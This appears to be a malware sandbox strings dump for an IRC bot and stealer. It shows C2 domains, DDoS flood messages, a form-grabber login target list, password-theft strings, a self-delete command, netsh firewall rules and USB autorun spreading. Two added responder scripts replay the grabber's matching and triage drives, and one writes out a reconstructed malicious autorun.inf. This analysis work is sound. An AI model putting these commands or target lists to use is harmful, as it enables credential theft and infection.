SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
hXXp://api.wipmania.com/
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
c:\%original file name%.exe
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
\\.\pipe\312a36d2
\\.\pipe\312a36d2
C:\Windows\system32\mspaint.exe
C:\Windows\system32\mspaint.exe
C:\Windows
C:\Windows
312a36d2.scr
312a36d2.scr
7 767
7 767
8*808;8~8
8*808;8~8
%s\Microsoft\%s.exe
%s\Microsoft\%s.exe
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
mspaint.exe
mspaint.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Windows\System32\mspaint.exe
\Device\HarddiskVolume1\Windows\System32\mspaint.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Roaming
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe
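The wildcard entries in the dump above (`*paypal.*/webscr?cmd=_login-submit*`, `*login.live.*/*post.srf*`, `*namecheap.com/*login*`, ...) together with the bare field names listed just before each of them (`login_password`, `login_email`, `passwd`, `LoginPassword`, ...) and the body globs (`*login_password=*`, `*passwd=*`) are the form-grabber's target list: the hook on `HttpSendRequestA/W` compares each outgoing request against the URL glob, checks the POST body for the password field, and reports the values through `[HTTP Login]: %s`. The Python below is an added example written for this page, not code from the report or from the bot. It replays that matching over constructed requests so a responder can run it over proxy or PCAP-extracted POSTs and see which logins from an infected host would have been lifted. Assumptions: the bot's glob treats only `*` as special (so `?` and `[` in the dump's patterns are literal) and matches case-insensitively, and the pairing of URL glob, body glob and field names is inferred from their adjacency in the dump; none of that is stated on the page.

```python
"""Replay of the form-grabber target list from the strings dump.

Added example, not code from the report or from the bot. Assumes a glob in
which only '*' is special and matching is case-insensitive; the grouping of
URL glob, body glob and field names is inferred from adjacency in the dump.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs


def glob_to_regex(glob: str) -> "re.Pattern[str]":
    """Compile a bot-style glob: '*' matches any run of characters, every
    other character (including '?' and '[') is literal. Anchored, case-insensitive."""
    parts = [re.escape(p) for p in glob.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE | re.DOTALL)


# (URL glob, POST-body glob, (username field or None, password field)).
# Globs and field names are copied from the dump; the grouping is this
# example's reading of which adjacent entries belong together.
TARGETS: List[Tuple[str, str, Tuple[Optional[str], str]]] = [
    ("*paypal.*/webscr?cmd=_login-submit*", "*login_password=*", ("login_email", "login_password")),
    ("*login.live.*/*post.srf*", "*passwd=*", ("login", "passwd")),
    ("*namecheap.com/*login*", "*LoginPassword=*", ("LoginUserName", "LoginPassword")),
    ("*google.*/*ServiceLoginAuth*", "*Passwd=*", (None, "Passwd")),
    ("*aol.*/*login.psp*", "*password=*", ("loginId", "password")),
]

_COMPILED = [(u, glob_to_regex(u), glob_to_regex(b), f) for u, b, f in TARGETS]


def grab(method: str, url: str, body: str) -> Optional[dict]:
    """What the hook would lift from one request: the matching URL glob plus
    the username/password values, or None when the request is not a target."""
    if method.upper() != "POST":
        return None
    for url_glob, url_re, body_re, (user_field, pass_field) in _COMPILED:
        if url_re.match(url) and body_re.match(body):
            fields = parse_qs(body, keep_blank_values=True)
            return {
                "target": url_glob,
                "user": fields.get(user_field, [None])[0] if user_field else None,
                "password": fields.get(pass_field, [None])[0],
            }
    return None


def scan(requests) -> List[dict]:
    """Run grab() over (method, url, body) triples and keep only the hits."""
    hits = [grab(m, u, b) for m, u, b in requests]
    return [h for h in hits if h is not None]


# Constructed sample traffic for the demo (not captured data).
SAMPLE_REQUESTS = [
    ("POST", "https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit",
     "login_email=alice%40example.com&login_password=hunter2&submit=Log+In"),
    ("GET", "https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit", ""),
    ("POST", "https://login.live.com/ppsecure/post.srf?wa=wsignin1.0",
     "login=bob%40hotmail.com&passwd=s3cret&PPSX=Pass"),
    ("POST", "https://www.namecheap.com/myaccount/login.aspx",
     "LoginUserName=erin&LoginPassword=pw%21&RememberMe=on"),
    ("POST", "https://www.google.com/accounts/ServiceLoginAuth",
     "Email=carol&Passwd=pw123&signIn=Sign+in"),
    ("POST", "https://www.example.com/login", "user=frank&password=nope"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```

The `?` in the PayPal glob is why a stock `fnmatch` would be wrong here: it would treat `?` as a single-character wildcard and still match, but it would also match `webscrXcmd=`, which the bot's literal comparison would not. The Google entry returns no username because the dump lists only `Passwd` next to that glob; adding a guessed field name would misstate what the bot captures.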
B5D6.exe_1928:
.text
`.rdata
XGZ^%s
tcP$a
#>n%D
B5D6.exe_1928_rwx_00170000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
c:\%original file name%.exe
\\.\pipe\312a36d2
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
8*808;8~8
%s\Microsoft\%s.exe
\\.\pipe
Internet Explorer\iexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\Desktop.ini
winlogon.exe
mspaint.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
^C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe
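The removable-drive spreader shows up in this region as a set of fragments: `%sautorun.tmp` renamed to `%sautorun.inf`, `icon=shell32.dll,7`, `shellexecute=` followed by `%windir%\system32\cmd.exe` and `/c "start ...\.Trashes\%s`, then `&&%%windir%%\explorer.exe` so the drive still opens, a `%0x.scr` payload name (here `312a36d2.scr`), and a `Desktop.ini` with `[.ShellClassInfo]` and the Recycle Bin CLSID `{645FF040-5081-101B-9F08-00AA002F954E}` to disguise the `.Trashes` folder. The Python below is an added triage script written for this page, not code from the report or the bot: it walks a mounted drive and reports which of those traits are present, and builds a constructed sample stick so it runs offline. The `%cd%`-style drive placeholder in the sample autorun.inf is an assumption; the byte the dump shows as `%Ã%` is not recoverable from the page.

```python
"""Triage of a removable drive for the USB-spreader layout in the dump.

Added example, not code from the report or from the bot. The autorun.inf it
looks for is reconstructed from the dump's fragments; the "%cd%" drive
placeholder used in the constructed sample is an assumption.
"""
import os
import re
import tempfile
from typing import Dict, List

# CLSID listed next to "[.ShellClassInfo]" in the dump: Explorer shows a folder
# whose Desktop.ini carries it with the Recycle Bin icon and name.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"


def _read_text(path: str) -> str:
    # autorun.inf / Desktop.ini on real media may be ANSI or UTF-16; read leniently.
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("latin-1")


def check_autorun_inf(text: str) -> List[str]:
    """Return the traits of the dump's autorun.inf that are present in text."""
    low = text.lower()
    findings: List[str] = []
    if re.search(r"^\s*shellexecute\s*=", low, re.M):
        findings.append("shellexecute= present")
    if re.search(r'cmd\.exe[^\r\n]*/c\s*"?start\b', low):
        findings.append("shellexecute runs cmd.exe /c start")
    if ".trashes\\" in low:
        findings.append("payload launched from a .Trashes folder")
    if "&&" in low and "explorer.exe" in low:
        findings.append("chains explorer.exe so the drive still opens normally")
    if re.search(r"^\s*icon\s*=\s*shell32\.dll,\s*7\b", low, re.M):
        findings.append("icon=shell32.dll,7 (drive icon, as in the dump)")
    return findings


def check_desktop_ini(text: str) -> bool:
    """True when a Desktop.ini disguises its folder with the Recycle Bin CLSID."""
    low = text.lower()
    return "[.shellclassinfo]" in low and RECYCLE_BIN_CLSID.lower() in low


def triage_drive(root: str) -> Dict[str, List[str]]:
    """Walk a mounted drive and collect the spreader's three artifacts."""
    result: Dict[str, List[str]] = {"autorun": [], "desktop_ini": [], "hidden_payloads": []}
    autorun = os.path.join(root, "autorun.inf")
    if os.path.isfile(autorun):
        result["autorun"] = check_autorun_inf(_read_text(autorun))
    for dirpath, _dirs, files in os.walk(root):
        in_trashes = os.path.basename(dirpath).lower() == ".trashes"
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "desktop.ini" and check_desktop_ini(_read_text(path)):
                result["desktop_ini"].append(path)
            if in_trashes and name.lower().endswith((".scr", ".exe")):
                result["hidden_payloads"].append(path)
    return result


def build_sample_drive() -> str:
    """Constructed stand-in for an infected stick (not a real capture)."""
    root = tempfile.mkdtemp(prefix="usb_")
    trashes = os.path.join(root, ".Trashes")
    os.makedirs(trashes)
    with open(os.path.join(root, "autorun.inf"), "w", newline="\r\n") as fh:
        fh.write("[autorun]\n")
        fh.write("icon=shell32.dll,7\n")
        # "%cd%" stands in for the drive placeholder the dump does not preserve.
        fh.write(r'shellexecute=%windir%\system32\cmd.exe /c "start %cd%.Trashes\312a36d2.scr"'
                 r' &&%windir%\explorer.exe %cd%' + "\n")
    with open(os.path.join(trashes, "Desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nCLSID=" + RECYCLE_BIN_CLSID + "\n")
    with open(os.path.join(trashes, "312a36d2.scr"), "wb") as fh:
        fh.write(b"MZ")  # placeholder bytes, not the sample
    return root


if __name__ == "__main__":
    drive = build_sample_drive()
    for key, value in triage_drive(drive).items():
        print(key, value)
```

Point it at a mount path (`triage_drive("/mnt/usb")` or `triage_drive("E:\\")`) rather than the sample. The checks are deliberately independent so a stick carrying only the Recycle-Bin `Desktop.ini` trick, or only the `cmd.exe /c start` chain, still produces a finding; an ordinary vendor `autorun.inf` with `open=setup.exe` produces none.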
B5D6.exe_1928_rwx_002A0000_0001D000:
tcPLh
SQLw
B5D6.exe_1928_rwx_002C0000_00007000:
.text
`.rdata
XGZ^%s
tcP$a
#>n%D
B5D6.exe_1928_rwx_00400000_00008000:
.text
`.rdata
XGZ^%s
tcP$a
#>n%D
B5D6.exe_1928_rwx_00550000_0000E000:
%uT"6
urlmon.dll
yahoo.com
google.com
bing.com
update.microsoft.com
microsoft.com
ntdll.dll
pool.ntp.org
africa.pool.ntp.org
oceania.pool.ntp.org
asia.pool.ntp.org
south-america.pool.ntp.org
north-america.pool.ntp.org
europe.pool.ntp.org
aReport
cdosys.dll
software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe
ws2_32.dll
x3
udPj
$4(4,40444
4 5(585`5|5
cmd.exe
/c %s
KBlu.exe
\system32\msiexec.exe
\SysWOW64\msiexec.exe
Mozilla/4.0
software\microsoft\windows\currentversion\policies\system
software\microsoft\windows\currentversion\Run
software\microsoft\windows nt\currentversion\Windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
:Zone.Identifier
ms%s.exe
software\microsoft\windows\currentversion\explorer\advanced
\cdo%lu.dll
\system32\cdosys.dll
\SysWOW64\cdosys.dll
cdo%lu.dll
software\microsoft\windows\currentversion\policies\Explorer
127.0.0.1
UC:\Windows\system32\*
crypt32.dll
ion.dll
3456-A289-439d-8115-601632D005A0
UC:\Windows\system32\crypt32.dll
twunk_16.exe_3204:
.text
`.rdata
@.data
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
MSVCRT.dll
_acmdln
SHLWAPI.dll
PSAPI.DLL
CRYPT32.dll
`0%x"
[8FTp}
.QzQD
M .TI
.Jg%4
H.nH_
]`rDo%c
HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0
HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
\kernel32.dll
%s %s
explorer.exe
twunk_16.exe_3392:
.text
`.rdata
@.data
.reloc
A
SSSSSSh
D$ PASSf
%s:ZKTDJRBHOEUDX
GET %s HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/%i.0 (Windows NT %i.%i; %srv:%i.0) Gecko/20100101 Firefox/%i.0
Mozilla/%i.0 (compatible; MSIE %i.0; Windows NT %i.%i; Trident/%i.0)
_wv=%s
network.http.spdy.enabled.v3-1
network.http.spdy.enabled
network.http.spdy.enabled.http2
PTF://%s:%s@%s:%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HttpSendRequestW
RegOpenKeyExW
RegCloseKey
%s\%ls\dmps\log.txt
%s\%ls\dmps\
%slog.txt
%slogs.cab
%s\Thunderbird\profiles.ini
%s\Thunderbird\%s
Thunderbird.Url.news\DefaultIcon
Type - Mail | Name - %s | User - %s | Password - %s&
HTTPMail User Name
HTTPMail Password2
POP3 Password2
pstorec.dll
%s%c%c
\logins.json
%snss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
encryptedPassword":
hXXps://
-----------------------------%d
Content-Disposition: form-data; name="data"; filename="%S"
POST %s HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-Type: multipart/form-data; boundary=---------------------------%d
Content-Length: %d
RegOpenKeyA
RegOpenKeyExA
GetProcessHeap
KERNEL32.dll
GetKeyNameTextW
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardState
GetKeyState
MapVirtualKeyW
USER32.dll
GDI32.dll
RegDeleteKeyW
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCRT.dll
_acmdln
ntdll.dll
WININET.dll
CRYPT32.dll
SHLWAPI.dll
WS2_32.dll
GdiplusShutdown
gdiplus.dll
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Content-type: application/x-www-form-urlencoded
netsh firewall add allowedprogram "%s" %s ENABLE
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s"
cabinet.dll
chrome.dll
Ws2_32.dll
%ls\screenshot.jpg
\settings3.bin
\settings.rdp
ws2_32.dll
wininet.dll
f/s %s
xul.dll
nss3.dll
nspr4.dll
Wininet.dll
okernel32.dll
Win Srv 2008
Win Srv 2003
Win Srv
Win XP
d.d.d
[ %s | Time - d:d (d.d.%d) ]
%S\%i.jpg
dAccount65.stg
Accounts70.tdat
Account71.rec0
Account.rec0
\kernel32.dll
%s %s
PGdiPlus.dll
schannel.dll
ping 127.0.0.1 -n 3&del "%s"
%s /c del %s
filezilla.exe
ftprush.exe
winscp.exe
corePTF.exe
freePTF.exe
far.exe
ftpte.exe
smartPTF.exe
flashfxp.exe
totalcmd.exe
twunk_16.exe_3204_rwx_00170000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
Fv.TBv
Fv.TBv
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
